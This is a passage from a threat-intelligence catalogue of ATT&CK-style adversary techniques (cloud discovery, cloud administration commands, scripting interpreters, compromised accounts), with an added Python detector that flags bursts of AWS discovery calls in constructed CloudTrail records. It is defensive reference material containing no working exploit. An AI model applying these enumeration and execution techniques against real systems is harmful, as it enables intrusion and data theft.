macOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.<sup>[[Operating with EmPyre](https://app.tidalcyber.com/references/459a4ad5-0e28-4bfc-a73e-b9dd516d516f)]</sup>

The tag is: misp-galaxy:technique="Clipboard Data"

Cloud Administration Command

Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.<sup>[[AWS Systems Manager Run Command](https://app.tidalcyber.com/references/ef66f17b-6a5b-5eb8-83de-943e2bddd114)]</sup><sup>[[Microsoft Run Command](https://app.tidalcyber.com/references/4f2e6adb-6e3d-5f1f-b873-4b99797f2bfa)]</sup><sup>[[SpecterOps Lateral Movement from Azure to On-Prem AD 2020](https://app.tidalcyber.com/references/eb97d3d6-21cb-5f27-9a78-1e8576acecdc)]</sup>

If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) to execute commands in connected virtual machines.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup>

The tag is: misp-galaxy:technique="Cloud Administration Command"

Cloud Infrastructure Discovery

An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Amazon Describe Instances API](https://app.tidalcyber.com/references/95629746-43d2-4f41-87da-4bd44a43ef4a)]</sup><sup>[[AWS Get Public Access Block](https://app.tidalcyber.com/references/f2887980-569a-4bc2-949e-bd8ff266c43c)]</sup><sup>[[AWS Head Bucket](https://app.tidalcyber.com/references/1388a78e-9f86-4927-a619-e0fcbac5b7a1)]</sup> Similarly, GCP’s Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project<sup>[[Google Compute Instances](https://app.tidalcyber.com/references/ae09e791-a00c-487b-b0e5-7768df0679a3)]</sup>, and Azure’s CLI command <code>az vm list</code> lists details of virtual machines.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup> In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through Wordlist Scanning.<sup>[[Malwarebytes OSINT Leaky Buckets - Hioureas](https://app.tidalcyber.com/references/67ebcf71-828e-4202-b842-f071140883f8)]</sup>

An adversary may enumerate resources using a compromised user’s access keys to determine which are available to that user.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup> The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup> An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries may also use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources.<sup>[[AWS Describe DB Instances](https://app.tidalcyber.com/references/85bda17d-7b7c-4d0e-a0d2-2adb5f0a6b82)]</sup> Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://app.tidalcyber.com/technique/5d0a3722-52b6-4968-a367-7ca6bc9a33fc), this technique focuses on the discovery of components of the provided services rather than the services themselves.
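The discovery calls named in this entry (<code>DescribeInstances</code>, <code>ListBuckets</code>, <code>HeadBucket</code>, <code>GetPublicAccessBlock</code>, <code>DescribeDBInstances</code>) all land in CloudTrail, so a defender can look for one identity sweeping several of them in a short window and then loosening a bucket's public-access settings. The following added example (not part of the MISP galaxy or ATT&CK text; the CloudTrail records, account ID, ARNs and addresses are constructed, and the exposure watch-list, window and threshold are assumptions) flags such bursts:

```python
"""Flag bursts of AWS infrastructure-discovery API calls in CloudTrail
records and note whether the same identity then changed a bucket's
public-access configuration.

Added example, not part of the MISP galaxy or the ATT&CK text it
reproduces. The CloudTrail records are constructed (account ID, ARNs and
addresses are placeholders); the discovery API names are the ones the
technique description lists, the rest are assumptions.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# APIs named in the technique description as used for discovery.
DISCOVERY_APIS = {"DescribeInstances", "ListBuckets", "HeadBucket",
                  "GetPublicAccessBlock", "DescribeDBInstances"}
# S3 calls that can open a bucket to anonymous access (assumed watch-list).
EXPOSURE_APIS = {"PutPublicAccessBlock", "PutBucketAcl", "PutBucketPolicy"}


def _rec(when, name, user, ip="203.0.113.10"):
    """Build one constructed CloudTrail record (placeholder account ID)."""
    return {"eventTime": when, "eventName": name, "sourceIPAddress": ip,
            "userIdentity": {"type": "IAMUser",
                             "arn": f"arn:aws:iam::123456789012:user/{user}"}}


# Constructed excerpt: a compromised key enumerates compute, storage and
# database resources within minutes and then loosens a bucket; an admin's
# two routine ListBuckets calls an hour apart are background noise.
SAMPLE_TRAIL = json.dumps({"Records": [
    _rec("2024-03-01T12:00:01Z", "DescribeInstances", "dev-ci"),
    _rec("2024-03-01T12:00:40Z", "ListBuckets", "dev-ci"),
    _rec("2024-03-01T12:01:10Z", "HeadBucket", "dev-ci"),
    _rec("2024-03-01T12:01:30Z", "GetPublicAccessBlock", "dev-ci"),
    _rec("2024-03-01T12:02:15Z", "DescribeDBInstances", "dev-ci"),
    _rec("2024-03-01T12:05:00Z", "PutPublicAccessBlock", "dev-ci"),
    _rec("2024-03-01T09:00:00Z", "ListBuckets", "ops-admin", "198.51.100.7"),
    _rec("2024-03-01T10:00:00Z", "ListBuckets", "ops-admin", "198.51.100.7"),
]})


def load_records(trail_json):
    """Parse a CloudTrail file body into (time, api, arn, source_ip) tuples."""
    out = []
    for r in json.loads(trail_json)["Records"]:
        when = datetime.strptime(r["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
        out.append((when, r["eventName"], r["userIdentity"]["arn"],
                    r["sourceIPAddress"]))
    return out


def flag_discovery_bursts(records, window=timedelta(minutes=15),
                          min_distinct=3):
    """Return one finding per identity whose calls cover at least
    min_distinct distinct discovery APIs inside one window."""
    by_arn = defaultdict(list)
    for rec in records:
        by_arn[rec[2]].append(rec)

    findings = []
    for arn, recs in by_arn.items():
        recs.sort()
        for i, (start, _, _, _) in enumerate(recs):
            in_window = [r for r in recs[i:] if r[0] - start <= window]
            apis = {api for _, api, _, _ in in_window if api in DISCOVERY_APIS}
            if len(apis) < min_distinct:
                continue
            # Any exposure change by the same identity after the burst began.
            exposure = any(api in EXPOSURE_APIS
                           for t, api, _, _ in recs if t >= start)
            findings.append({"arn": arn,
                             "source_ips": sorted({r[3] for r in in_window}),
                             "distinct_discovery_apis": len(apis),
                             "apis": sorted(apis),
                             "followed_by_exposure_change": exposure})
            break
    return findings


if __name__ == "__main__":
    for finding in flag_discovery_bursts(load_records(SAMPLE_TRAIL)):
        print(json.dumps(finding, indent=2))
```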

The tag is: misp-galaxy:technique="Cloud Infrastructure Discovery"

Cloud Service Dashboard

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.<sup>[[Google Command Center Dashboard](https://app.tidalcyber.com/references/a470fe2a-40ce-4060-8dfc-2cdb56bbc18b)]</sup>

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.

The tag is: misp-galaxy:technique="Cloud Service Dashboard"

Cloud Service Discovery

An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ between platform-as-a-service (PaaS), infrastructure-as-a-service (IaaS), and software-as-a-service (SaaS) offerings. Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.<sup>[[Azure - Resource Manager API](https://app.tidalcyber.com/references/223cc020-e88a-4236-9c34-64fe606a1729)]</sup><sup>[[Azure AD Graph API](https://app.tidalcyber.com/references/fed0fef5-e366-4e24-9554-0599744cd1c6)]</sup>

For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.<sup>[[Azure - Stormspotter](https://app.tidalcyber.com/references/42383ed1-9705-4313-8068-28a22a23f50e)]</sup><sup>[[GitHub Pacu](https://app.tidalcyber.com/references/bda43b1b-ea8d-4371-9984-6d8a7cc24965)]</sup>

Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6) or [Disable or Modify Cloud Logs](https://app.tidalcyber.com/technique/6824cdb3-a4c5-45a8-a3d5-5a5afd347214).

The tag is: misp-galaxy:technique="Cloud Service Discovery"

Cloud Storage Object Discovery

Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://app.tidalcyber.com/technique/fd346e4e-b22f-4cae-bc24-946d7b14b5e1)) adversaries may access the contents/objects stored in cloud infrastructure.

Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS<sup>[[ListObjectsV2](https://app.tidalcyber.com/references/727c2077-f922-4314-908a-356c42564181)]</sup> and List Blobs in Azure.<sup>[[List Blobs](https://app.tidalcyber.com/references/f9aa697a-83dd-4bae-bc11-006be51ce477)]</sup>

The tag is: misp-galaxy:technique="Cloud Storage Object Discovery"

AppleScript

Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.<sup>[[Apple AppleScript](https://app.tidalcyber.com/references/b23abcb8-3004-4a42-8ada-58cdbd65e171)]</sup> These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding <code>#!/usr/bin/osascript</code> to the start of the script file.<sup>[[SentinelOne AppleScript](https://app.tidalcyber.com/references/bb6aafcb-ed30-404a-a9d9-b90503a0ec7c)]</sup>

AppleScripts do not need to call <code>osascript</code> to execute: they may also be executed from within mach-O binaries by using the macOS [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)s <code>NSAppleScript</code> or <code>OSAScript</code>, both of which execute code independent of the <code>/usr/bin/osascript</code> command line utility.

Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)s, which otherwise would require compilation and execution in a mach-O binary file format.<sup>[[SentinelOne macOS Red Team](https://app.tidalcyber.com/references/4b05bd7c-22a3-4168-850c-8168700b17ba)]</sup> Since this is a scripting language, it can be used to launch more common techniques as well, such as a reverse shell via [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65).<sup>[[Macro Malware Targets Macs](https://app.tidalcyber.com/references/d63f3f6a-4486-48a4-b2f8-c2a8d571731a)]</sup>

The tag is: misp-galaxy:technique="AppleScript"

Cloud API

Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) modules like Azure for PowerShell<sup>[[Microsoft - Azure PowerShell](https://app.tidalcyber.com/references/3b17b649-9efa-525f-aa49-cf6c9ad559d7)]</sup>, or software developer kits (SDKs) available for languages such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65).

Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.

With proper permissions (often via use of credentials such as [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc) and [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.

The tag is: misp-galaxy:technique="Cloud API"

JavaScript

Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.<sup>[[NodeJS](https://app.tidalcyber.com/references/af710d49-48f4-47f6-98c6-8d4a4568b020)]</sup>

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) and Internet Explorer HTML Application (HTA) pages.<sup>[[JScrip May 2018](https://app.tidalcyber.com/references/99e48516-f918-477c-b85e-4ad894cc031f)]</sup><sup>[[Microsoft JScript 2007](https://app.tidalcyber.com/references/e3c97d0f-150e-4fe3-a4ce-fc146a2fa718)]</sup><sup>[[Microsoft Windows Scripts](https://app.tidalcyber.com/references/9e7cd4da-da18-4d20-809a-19abb4352807)]</sup>

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.<sup>[[Apple About Mac Scripting 2016](https://app.tidalcyber.com/references/d2f32ac1-9b5b-408d-a7ab-d92dd9efe0ed)]</sup><sup>[[SpecterOps JXA 2020](https://app.tidalcyber.com/references/d9b6bb05-6ab4-4f5e-9ef0-f3e0cc97ce29)]</sup><sup>[[SentinelOne macOS Red Team](https://app.tidalcyber.com/references/4b05bd7c-22a3-4168-850c-8168700b17ba)]</sup><sup>[[Red Canary Silver Sparrow Feb2021](https://app.tidalcyber.com/references/f08a856d-6c3e-49e2-b7ba-399831c637e5)]</sup><sup>[[MDSec macOS JXA and VSCode](https://app.tidalcyber.com/references/979cac34-d447-4e42-b17e-8ab2630bcfec)]</sup>

Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0).

The tag is: misp-galaxy:technique="JavaScript"

Network Device CLI

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.

Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

The tag is: misp-galaxy:technique="Network Device CLI"

PowerShell

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.<sup>[[TechNet PowerShell](https://app.tidalcyber.com/references/20ec94d1-4a5c-43f5-bb65-f3ea965d2b6e)]</sup> Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell’s underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).<sup>[[Sixdub PowerPick Jan 2016](https://app.tidalcyber.com/references/52190592-5809-4e7b-a19c-fc87b245025c)]</sup><sup>[[SilentBreak Offensive PS Dec 2015](https://app.tidalcyber.com/references/8eec1af3-c65e-4522-8087-73122ac6c281)]</sup><sup>[[Microsoft PSfromCsharp APR 2014](https://app.tidalcyber.com/references/83e346d5-1894-4c46-98eb-88a61ce7f003)]</sup>

The tag is: misp-galaxy:technique="PowerShell"

Python

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

The tag is: misp-galaxy:technique="Python"

Unix Shell

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.<sup>[[DieNet Bash](https://app.tidalcyber.com/references/c5b362ce-6bae-46f7-b047-e3a0b2bf2580)]</sup><sup>[[Apple ZShell](https://app.tidalcyber.com/references/5374ad8e-96a2-4d19-b2cf-28232fa97b52)]</sup> Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

The tag is: misp-galaxy:technique="Unix Shell"

Visual Basic

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) and the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.<sup>[[VB .NET Mar 2020](https://app.tidalcyber.com/references/da6d1b56-8e59-4125-b318-48a40a1c8e94)]</sup><sup>[[VB Microsoft](https://app.tidalcyber.com/references/b23a1a5d-48dd-4346-bf8d-390624214081)]</sup>

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.<sup>[[Microsoft VBA](https://app.tidalcyber.com/references/ba0e3c5d-7934-4ece-b4a1-c03bc355f378)]</sup><sup>[[Wikipedia VBA](https://app.tidalcyber.com/references/70818420-c3ec-46c3-9e97-d8f989f2e3db)]</sup> VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).<sup>[[Microsoft VBScript](https://app.tidalcyber.com/references/5ea8d8c7-8039-4210-967a-a4dcd566bf95)]</sup>

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) payloads (which may also involve [Mark-of-the-Web Bypass](https://app.tidalcyber.com/technique/7ee64e42-6d3b-47f8-a2a9-55263537bd51) to enable execution).<sup>[[Default VBS macros Blocking](https://app.tidalcyber.com/references/d86883dd-3766-4971-91c7-b205ed13cc37)]</sup>

The tag is: misp-galaxy:technique="Visual Basic"

Windows Command Shell

Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).<sup>[[SSH in Windows](https://app.tidalcyber.com/references/3006af23-b802-400f-841d-7eea7d748d28)]</sup>

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) to execute various commands and payloads. Common uses include [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) to execute a single command, or abusing [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) interactively with input and output forwarded over a command and control channel.

The tag is: misp-galaxy:technique="Windows Command Shell"

Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7) while Windows installations include the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde).

There are also cross-platform interpreters such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65), as well as those commonly associated with client applications such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4).

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) in order to achieve remote Execution.<sup>[[Powershell Remote Commands](https://app.tidalcyber.com/references/24c526e1-7199-45ca-99b4-75e75c7041cd)]</sup><sup>[[Cisco IOS Software Integrity Assurance - Command History](https://app.tidalcyber.com/references/dbca06dd-1184-4d52-9ee8-b059e368033c)]</sup><sup>[[Remote Shell Execution in Python](https://app.tidalcyber.com/references/4ea54256-42f9-4b35-8f9e-e595ab9be9ce)]</sup>

The tag is: misp-galaxy:technique="Command and Scripting Interpreter"

Communication Through Removable Media

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

The tag is: misp-galaxy:technique="Communication Through Removable Media"

Cloud Accounts - Duplicate2

Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://app.tidalcyber.com/technique/ce886c55-17ab-4c1c-90dc-3aa93e69bdb4) or to [Upload Tool](https://app.tidalcyber.com/technique/d7594eaf-286f-4484-94fa-8608c911767a)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23)s or [Serverless](https://app.tidalcyber.com/technique/c30faf84-496b-4f27-a4bc-aa36d583c69f) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.<sup>[[Awake Security C2 Cloud](https://app.tidalcyber.com/references/fa3762ce-3e60-4991-b464-12601d2a6912)]</sup>

A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, conducting [Password Spraying](https://app.tidalcyber.com/technique/e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a) attacks, or attempting to Steal Application Access Tokens.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup> Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) between service providers and their customers.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup>

The tag is: misp-galaxy:technique="Cloud Accounts - Duplicate2"

Email Accounts - Duplicate

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)).

A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup> Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) emails may evade reputation-based email filtering rules.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

The tag is: misp-galaxy:technique="Email Accounts - Duplicate"

Social Media Accounts - Duplicate

Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://app.tidalcyber.com/technique/fe0bf22c-efb2-4bc6-96d8-e0e909502fd7)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

